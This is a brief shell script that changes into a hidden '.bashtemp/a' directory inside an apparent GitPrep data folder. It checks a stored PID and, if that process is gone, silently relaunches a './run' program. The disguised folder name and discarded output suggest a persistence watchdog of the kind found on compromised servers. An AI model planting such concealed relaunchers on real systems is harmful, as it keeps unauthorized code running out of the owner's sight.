#!/bin/sh
cd /home/pronoor/gitprep/data/rep/.bashtemp/a
if test -r /home/pronoor/gitprep/data/rep/.bashtemp/a/bash.pid; then
pid=$(cat /home/pronoor/gitprep/data/rep/.bashtemp/a/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
./run &>/dev/null
